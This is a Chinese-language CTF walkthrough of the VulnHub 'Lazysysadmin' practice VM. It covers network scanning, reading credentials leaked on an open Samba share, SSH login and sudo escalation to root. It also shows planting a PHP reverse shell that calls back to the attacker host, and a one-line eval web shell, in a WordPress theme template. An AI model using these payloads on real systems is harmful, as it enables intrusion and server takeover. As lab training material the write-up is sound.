VM - Lazysysadmin 的破解
本文主要記錄對 Lazysysadmin 的滲透學習過程,測試的 VM 主機主要來源 www.vulnhub.com
部落格集:面向 CTF 的 VM 破解系列
下載連結: Lazysysadmin
1. ip 探測
-
ip 探測
使用 netdiscover,由於在內網,可以直接掃網網段
root@kali:~# netdiscover -r 10.10.10.0/24 Currently scanning: Finished! | Screen View: Unique Hosts 5 Captured ARP Req/Rep packets, from 4 hosts. Total size: 300 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 10.10.10.1 00:50:56:c0:00:08 2 120 VMware, Inc. 10.10.10.2 00:50:56:e5:a6:4e 1 60 VMware, Inc. 10.10.10.133 00:0c:29:9e:53:39 1 60 VMware, Inc. 10.10.10.254 00:50:56:ea:fa:42 1 60 VMware, Inc.
發現 ip 地址為 10.10.10.133
-
埠掃描
使用 masscan ,可以進行限速
root@kali:~# masscan 10.10.10.133 -p1-1000 --rate=10000 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2018-08-16 13:16:13 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [1000 ports/host] Discovered open port 22/tcp on 10.10.10.133 Discovered open port 80/tcp on 10.10.10.133 Discovered open port 139/tcp on 10.10.10.133 Discovered open port 445/tcp on 10.10.10.133
-
掃描埠和服務
使用 nmap 掃描
root@kali:~# nmap -T4 -A -v 10.10.10.133 -p0-10000 Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-16 09:18 EDT NSE: Loaded 148 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 09:18 Completed NSE at 09:18, 0.00s elapsed Initiating NSE at 09:18 Completed NSE at 09:18, 0.00s elapsed Initiating ARP Ping Scan at 09:18 Scanning 10.10.10.133 [1 port] Completed ARP Ping Scan at 09:18, 0.04s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 09:18 Completed Parallel DNS resolution of 1 host. at 09:18, 0.02s elapsed Initiating SYN Stealth Scan at 09:18 Scanning 10.10.10.133 (10.10.10.133) [10001 ports] Discovered open port 3306/tcp on 10.10.10.133 Discovered open port 22/tcp on 10.10.10.133 Discovered open port 139/tcp on 10.10.10.133 Discovered open port 445/tcp on 10.10.10.133 Discovered open port 80/tcp on 10.10.10.133 Discovered open port 6667/tcp on 10.10.10.133 Completed SYN Stealth Scan at 09:18, 1.41s elapsed (10001 total ports) Initiating Service scan at 09:18 Scanning 6 services on 10.10.10.133 (10.10.10.133) Completed Service scan at 09:19, 11.03s elapsed (6 services on 1 host) Initiating OS detection (try #1) against 10.10.10.133 (10.10.10.133) NSE: Script scanning 10.10.10.133. Initiating NSE at 09:19 Completed NSE at 09:19, 10.27s elapsed Initiating NSE at 09:19 Completed NSE at 09:19, 0.01s elapsed Nmap scan report for 10.10.10.133 (10.10.10.133) Host is up (0.00088s latency). Not shown: 9995 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA) | 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA) | 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA) |_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-generator: Silex v2.2.7 | http-methods: |_ Supported Methods: OPTIONS GET HEAD POST | http-robots.txt: 4 disallowed entries |_/old/ /test/ /TR2/ /Backnode_files/ |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Backnode 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 3306/tcp open mysql MySQL (unauthorized) 6667/tcp open irc InspIRCd | irc-info: | server: Admin.local | users: 1 | servers: 1 | chans: 0 | lusers: 1 | lservers: 0 | source ident: nmap | source host: 10.10.10.128 |_ error: Closing link: (nmap@10.10.10.128) [Client exited] MAC Address: 00:0C:29:9E:53:39 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Uptime guess: 0.008 days (since Thu Aug 16 09:07:34 2018) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=259 (Good luck!) IP ID Sequence Generation: All zeros Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -3h20m00s, deviation: 5h46m24s, median: 0s | nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | Names: | LAZYSYSADMIN<00> Flags: <unique><active> | LAZYSYSADMIN<03> Flags: <unique><active> | LAZYSYSADMIN<20> Flags: <unique><active> | WORKGROUP<00> Flags: <group><active> |_ WORKGROUP<1e> Flags: <group><active> | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: lazysysadmin | NetBIOS computer name: LAZYSYSADMIN\x00 | Domain name: \x00 | FQDN: lazysysadmin |_ System time: 2018-08-16T23:19:03+10:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2018-08-16 09:19:03 |_ start_date: N/A TRACEROUTE HOP RTT ADDRESS 1 0.88 ms 10.10.10.133 (10.10.10.133) NSE: Script Post-scanning. Initiating NSE at 09:19 Completed NSE at 09:19, 0.00s elapsed Initiating NSE at 09:19 Completed NSE at 09:19, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 28.49 seconds Raw packets sent: 10024 (441.850KB) | Rcvd: 10017 (401.394KB)
-
爆破目錄
使用 dirb 爆破目錄
root@kali:~# dirb http://10.10.10.133 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o Desktop/result.txt
-
獲取伺服器的 banner 資訊
root@kali:~# curl -I 10.10.10.133 HTTP/1.1 200 OK Date: Thu, 16 Aug 2018 13:29:36 GMT Server: Apache/2.4.7 (Ubuntu) Last-Modified: Sun, 06 Aug 2017 05:02:15 GMT ETag: "8ce8-5560ea23d23c0" Accept-Ranges: bytes Content-Length: 36072 Vary: Accept-Encoding Content-Type: text/html
-
使用 wpscan 掃描
root@kali:~# wpscan -u http://10.10.10.133/wordpress --force
-
使用 enum4linux 掃描
root@kali:~# enum4linux 10.10.10.133
-
獲取共享資源
win 下
net user k" \\10.10.10.133\share
linux 下
root@kali:~# mount -t cifs -o username='',password='' //10.10.10.133/share$ /mnt root@kali:~# cd /mnt/
發現了兩個重要檔案 deets.txt 和 wp-config.php
root@kali:/mnt# cat deets.txt CBF Remembering all these passwords. Remember to remove this file and update your password after we push out the server. Password 12345 root@kali:/mnt/wordpress# cat wp-config.php // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'wordpress'); /** MySQL database username */ define('DB_USER', 'Admin'); /** MySQL database password */ define('DB_PASSWORD', 'TogieMYSQL12345^^'); /** MySQL hostname */ define('DB_HOST', 'localhost'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', '');
上述發現敏感檔案,密碼為 12345,mysql 使用者名稱和密碼為 Admin:TogieMYSQL12345^^
-
登入 ssh
登入 phpmyadmin
訪問 wordpress 頁面發現提示使用者名稱為 togie,使用 ssh 登入ssh togie@10.10.10.133
登入成功
togie@LazySysAdmin:~$ whoami togie togie@LazySysAdmin:~$ id uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) togie@LazySysAdmin:~$ sudo su [sudo] password for togie: root@LazySysAdmin:/home/togie#
檢視 flag
root@LazySysAdmin:~# cat proof.txt
-
登入 wordpress
在管理頁面的 Apperance -> Editor ,修改 404 頁面的模板
新增內容:
set_time_limit (0); $VERSION = "1.0"; $ip = '10.10.10.128'; $port = '4444'; $CHUNK_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a;w;id;/bin/sh -i'; $darmon = 0; $debug = 0;
kali 設定反彈,獲取到初始的 shell 環境
或者修改為一句話木馬,使用菜刀連線
<?php eval($_POST[pass]);?>http://10.10.10.133/wordpress/wp-content/themes/twentyfifteen/404.php
提示 no tty present and no asdpass program spacified可以使用 python -c ‘import pty; pty.spawn("/bin/sh")’,將初始的 shell 切換為 bash shell 環境
相關文章
- VM - DerpNStink 的破解
- VM - Raven: 1 的破解
- 面向 CTF 的 VM 破解系列
- VM - Typhoon 1.02 的破解
- VM - FourAndSix 2.01 的破解
- VM - 64Base_3mrgnc3 的破解
- VM - CH4INRULZ_v1.0.1 的破解
- VM - 6Days_Lab-v1.0.1 的破解
- VM - JIS-CTF-VulnUpload-CTF01 的破解
- Lazysysadmin靶機筆記筆記
- 把ASM下的HDD VM轉換成ARM下Managed Disk的SSD VMASM
- Azure VM的加速網路
- Vm 增加硬碟硬碟
- [VM trunk ports]opensatck VM 單網路卡,多VLAN配置
- 在ARM模式下捕獲VM並建立新VM模式
- node核心模組-vm
- Oracle VM釋出Oracle
- JAVA VM 與DalvikJava
- docker vm 效能優劣Docker
- css vm用法介紹CSS
- VM 常用命令
- Oracle VM初識(一)Oracle
- Oracle VM初識(二)Oracle
- solaris vm create new lv
- 資料:Java HotSpot VMJavaHotSpot
- 聊聊HotSpot VM的Native Memory TrackingHotSpot
- VM中的Ubuntu(16.04)安裝tenserflowUbuntu
- 正確使用Windows Azure 中的VM RoleWindows
- limo和Dalvik VM的一個思路
- Flutter:VM snapshot must be valid. Check failed: vm. Must be able to initializeFlutterAI
- Java的破解和反破解之道 (轉)Java
- idea VM Options 設定Idea
- NodeJs VM模組詳解NodeJS
- VM軟體建立共享磁碟
- oracle VM掛載光碟機Oracle
- vm server RAC--補丁Server
- vm server RAC--IP 地址Server
- Oracle rac on vm--共享磁碟Oracle